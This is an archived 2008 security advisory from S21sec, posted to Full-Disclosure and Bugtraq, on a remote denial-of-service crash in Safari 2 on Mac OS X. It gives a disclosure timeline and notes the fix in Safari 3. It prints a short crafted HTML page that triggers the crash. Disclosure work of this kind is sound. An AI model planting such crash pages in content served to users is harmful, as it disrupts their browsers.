lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Sat, 12 Jan 2008 16:30:14 +0100 (CET)
From: "S21sec labs" <s21seclabs@...sec.com>
To: full-disclosure@...ts.grok.org.uk,
 bugtraq@...urityfocus.com
Subject: Safari 2 Denial of Service

##############################################################

                     - S21Sec Advisory -

##############################################################

    Title:  Safari 2 Denial of Service
       ID:  S21SEC-039-en
 Severity:  Medium - Remote DoS
  History:  15.Jul.2007 Vulnerability discovered
            22.Jul.2007 Vendor contacted
            27.Jul.2007 Vendor confirmed the vulnerability
            26.Oct.2007 Safari 3 in Leopard
            14.Nov.2007 Safari 3 in Tiger

    Scope:  Remote Denial of Service
Platforms:  MacOSX
   Author:  David Barroso (dbarroso@...sec.com)
      URL:  http://www.s21sec.com/avisos/s21sec-039-en.txt
  Release:  Public


[ SUMMARY ]

According to Wikipedia, Safari is a web browser developed by Apple Inc.
and included in Mac OS X.
It was first released as a public beta on January 7, 2003, as the default
browser in Mac OS X v10.3. A beta version for Microsoft Windows was
released for the first time on June 11, 2007 with support for Windows XP
and Windows Vista


[ AFFECTED VERSIONS ]

Following versions are affected with this issue:

    - Safari Version 2 (MacOSX Version)


[ DESCRIPTION ]

A crafted HTML page can make Safari crash when trying to parse the page
due to an unproper validation in the KHTML Webkit.
Example:

<html>
<head>
<title>Safari Exploit</title>
</head>
<body>

<form>
<div id="foo" style="display:none;">
<table>
<tr>
<td></td>
</tr>
</table>
</div>
<input type="text" />
</form>
</body>
</html>

[ WORKAROUND ]

The vulnerability was patched in Safari 3, officially released on October,
2007 (Leopard) and November, 2007 (Tiger).


[ ACKNOWLEDGMENTS ]

This vulnerability have been found and researched by:

    - David Barroso <dbarroso@...sec.com> S21sec labs


[ REFERENCES ]

* Wikipedia. Safari
  http://en.wikipedia.org/wiki/Safari_%28web_browser%29

* Safari
  http://www.apple.com/safari/

* S21Sec
  http://www.s21sec.com

* Blog S21sec
  http://blog.s21sec.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ